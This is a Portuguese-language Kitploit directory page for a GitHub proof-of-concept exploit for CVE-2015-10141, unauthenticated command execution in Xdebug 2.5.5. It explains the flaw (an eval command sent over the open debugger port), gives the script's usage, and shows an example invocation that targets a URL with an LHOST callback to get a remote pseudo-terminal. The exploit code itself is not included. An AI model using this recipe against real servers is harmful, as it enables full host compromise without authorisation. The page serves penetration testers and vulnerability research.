Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-10141 — POC exploit for CVE-2015-10141 | Kitploit
Ferramentas/GitHubGitHub/d3ext/cve-2015-10141
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubd3ext/cve-2015-10141

CVE-2015-10141

POC exploit for CVE-2015-10141

Ver Repositório
319há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2015-10141

root@kitploit:~
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141

Explicação

Existe uma vulnerabilidade de injeção de comandos do sistema operacional não autenticada nas versões 2.5.5 e anteriores do Xdebug, uma extensão de depuração PHP. Quando a depuração remota está ativada, o Xdebug escuta na porta 9000 e aceita comandos do protocolo do depurador sem autenticação. Um atacante pode enviar um comando eval manipulado através desta interface para executar código PHP arbitrário, que pode invocar funções de nível de sistema, como system() ou passthru(). Isto resulta no comprometimento total do anfitrião sob os privilégios do utilizador do servidor web.

Uso

root@kitploit:~
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE

Basta executar o exploit e fornecer um URL válido com um ficheiro PHP como index.php e o anfitrião local. Depois o exploit tentará estabelecer um pseudo-terminal que lhe permite executar comandos remotamente

root@kitploit:~
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

Tenha em conta que, em alguns casos, a saída não será refletida e verá apenas a primeira linha do comando executado; isto não é um problema do script, a vulnerabilidade funciona assim)

References

root@kitploit:~
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210

Licença

Este projeto está sob licença MIT

Copyright © 2025, D3Ext

Baixar ferramenta